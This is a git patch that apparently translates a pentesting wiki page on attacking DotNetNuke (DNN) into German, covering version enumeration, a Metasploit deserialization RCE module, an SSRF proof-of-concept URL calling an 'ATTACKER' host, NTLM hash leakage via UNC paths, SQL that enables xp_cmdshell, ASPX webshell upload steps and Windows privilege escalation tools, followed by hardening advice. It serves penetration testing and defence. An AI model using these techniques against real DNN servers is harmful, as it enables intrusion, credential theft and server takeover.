From 577371cb9989ffbf868c77f8174d7bf31cad6475 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 19 Jul 2025 08:09:35 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/dotnetnuke-d --- .../pentesting-web/dotnetnuke-dnn.md | 97 +++++++++++++++---- 1 file changed, 76 insertions(+), 21 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md index 654027bf3..e0a46f33b 100644 --- a/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md +++ b/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md @@ -4,37 +4,92 @@ ## DotNetNuke (DNN) -Wenn Sie sich als **Administrator** in DNN anmelden, ist es einfach, RCE zu erhalten. +Wenn Sie sich als **Administrator** in DNN anmelden, ist es einfach, **RCE** zu erhalten. In den letzten Jahren wurden jedoch eine Reihe von *unauthentifizierten* und *post-auth* Techniken veröffentlicht. Das folgende Cheat-Sheet sammelt die nützlichsten Primitiven für sowohl offensive als auch defensive Arbeiten. -## RCE +--- +## Versions- & Umgebungsenumeration -### Über SQL +* Überprüfen Sie den *X-DNN* HTTP-Antwortheader – er gibt normalerweise die genaue Plattformversion an. +* Der Installationsassistent gibt die Version in `/Install/Install.aspx?mode=install` preis (zugänglich bei sehr alten Installationen). +* `/API/PersonaBar/GetStatus` (9.x) gibt ein JSON-Blob zurück, das `"dnnVersion"` für Benutzer mit niedrigen Berechtigungen enthält. +* Typische Cookies, die Sie in einer Live-Instanz sehen werden: +* `.DOTNETNUKE` – ASP.NET Forms-Authentifizierungsticket. +* `DNNPersonalization` – enthält XML/serialisierte Benutzerdaten (alte Versionen – siehe RCE unten). -Eine SQL-Konsole ist auf der **`Einstellungen`**-Seite zugänglich, wo Sie **`xp_cmdshell`** aktivieren und **Betriebssystembefehle ausführen** können. +--- +## Unauthentifizierte Ausnutzung -Verwenden Sie diese Zeilen, um **`xp_cmdshell`** zu aktivieren: -```sql -EXEC sp_configure 'show advanced options', '1' -RECONFIGURE -EXEC sp_configure 'xp_cmdshell', '1' -RECONFIGURE +### 1. Cookie-Deserialisierung RCE (CVE-2017-9822 & Folgemaßnahmen) +*Betroffene Versionen ≤ 9.3.0-RC* + +`DNNPersonalization` wird bei jeder Anfrage deserialisiert, wenn der integrierte 404-Handler aktiviert ist. Durch manipuliertes XML kann daher zu beliebigen Gadget-Ketten und Codeausführung führen. ``` -Und drücken Sie **"Run Script"**, um diese SQL-Sätze auszuführen. - -Verwenden Sie dann etwas wie das Folgende, um OS-Befehle auszuführen: -```sql -xp_cmdshell 'whoami' +msf> use exploit/windows/http/dnn_cookie_deserialization_rce +msf> set RHOSTS +msf> set LHOST +msf> run ``` -### Via ASP-Webshell +Das Modul wählt automatisch den richtigen Pfad für gepatchte, aber weiterhin anfällige Versionen (CVE-2018-15811/15812/18325/18326). Die Ausnutzung funktioniert **ohne Authentifizierung** bei 7.x–9.1.x und mit einem *verifizierten* Konto mit niedrigen Rechten bei 9.2.x+. -In `Settings -> Security -> More -> More Security Settings` können Sie **neue erlaubte Erweiterungen** unter `Allowable File Extensions` hinzufügen und dann auf die Schaltfläche `Save` klicken. +### 2. Server-Side Request Forgery (CVE-2025-32372) +*Betroffene Versionen < 9.13.8 – Patch veröffentlicht April 2025* -Fügen Sie **`asp`** oder **`aspx`** hinzu und laden Sie dann in **`/admin/file-management`** eine **asp-Webshell** namens `shell.asp` hoch, zum Beispiel. +Ein Umgehen des älteren `DnnImageHandler`-Fixes ermöglicht es einem Angreifer, den Server zu zwingen, **willkürliche GET-Anfragen** auszuführen (semi-blind SSRF). Praktische Auswirkungen: -Greifen Sie dann auf **`/Portals/0/shell.asp`** zu, um auf Ihre Webshell zuzugreifen. +* Interner Port-Scan / Metadaten-Service-Entdeckung in Cloud-Bereitstellungen. +* Erreichen von Hosts, die sonst durch eine Firewall vom Internet getrennt sind. -### Privilegieneskalation +Proof-of-Concept (ersetzen Sie `TARGET` & `ATTACKER`): +``` +https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc +``` +Die Anfrage wird im Hintergrund ausgelöst; überwachen Sie Ihren Listener auf Rückrufe. -Sie können **Privilegien eskalieren** mit **Potatoes** oder **PrintSpoofer**, zum Beispiel. +### 3. NTLM-Hash-Exposition über UNC-Umleitung (CVE-2025-52488) +*Betroffene Versionen 6.0.0 – 9.x (< 10.0.1)* +Spezial angefertigte Inhalte können DNN dazu bringen, zu versuchen, eine Ressource über einen **UNC-Pfad** wie `\\attacker\share\img.png` abzurufen. Windows führt bereitwillig die NTLM-Verhandlung durch und leckt die Serverkonto-Hashes an den Angreifer. Aktualisieren Sie auf **10.0.1** oder deaktivieren Sie ausgehendes SMB an der Firewall. + +### 4. IP-Filter-Umgehung (CVE-2025-52487) +Wenn Administratoren auf *Host/IP-Filter* zum Schutz des Admin-Portals angewiesen sind, seien Sie sich bewusst, dass Versionen vor **10.0.1** durch Manipulation von `X-Forwarded-For` in einem Reverse-Proxy-Szenario umgangen werden können. + +--- +## Post-Authentifizierung zu RCE + +### Über SQL-Konsole +Unter **`Einstellungen → SQL`** ermöglicht ein integriertes Abfragefenster die Ausführung gegen die Site-Datenbank. Auf Microsoft SQL Server können Sie **`xp_cmdshell`** aktivieren und Befehle ausführen: +```sql +EXEC sp_configure 'show advanced options', 1; +RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; +RECONFIGURE; +GO +xp_cmdshell 'whoami'; +``` +### Über ASPX-Webshell-Upload +1. Gehe zu **`Einstellungen → Sicherheit → Mehr → Weitere Sicherheitseinstellungen`**. +2. Füge `aspx` (oder `asp`) zu **Erlaubte Dateierweiterungen** hinzu und **speichere**. +3. Gehe zu **`/admin/file-management`** und lade `shell.aspx` hoch. +4. Rufe es auf unter **`/Portals/0/shell.aspx`**. + +--- +## Privilegieneskalation unter Windows +Sobald die Codeausführung als **IIS AppPool\** erreicht ist, gelten gängige Windows-Privilegieneskalationstechniken. Wenn die Box anfällig ist, kannst du Folgendes nutzen: + +* **PrintSpoofer** / **SpoolFool**, um *SeImpersonatePrivilege* auszunutzen. +* **Juicy/Sharp Potatoes**, um *Service Accounts* zu entkommen. + +--- +## Empfehlungen zur Härtung (Blue Team) + +* **Upgrade** auf mindestens **9.13.9** (behebt SSRF-Umgehung) oder vorzugsweise **10.0.1** (IP-Filter- & NTLM-Probleme). +* Entferne verbleibende **`InstallWizard.aspx*`**-Dateien nach der Installation. +* Deaktiviere ausgehendes SMB (Ports 445/139). +* Erzwinge starke *Host-Filter* am Edge-Proxy anstelle innerhalb von DNN. +* Blockiere den Zugriff auf `/API/RemoteContentProxy`, wenn nicht verwendet. + +## Referenzen + +* Metasploit `dnn_cookie_deserialization_rce` Modul-Dokumentation – praktische Details zur nicht authentifizierten RCE (GitHub). +* GitHub-Sicherheitsberatung GHSA-3f7v-qx94-666m – Informationen zur SSRF-Umgehung & Patch-Informationen von 2025. {{#include ../../banners/hacktricks-training.md}}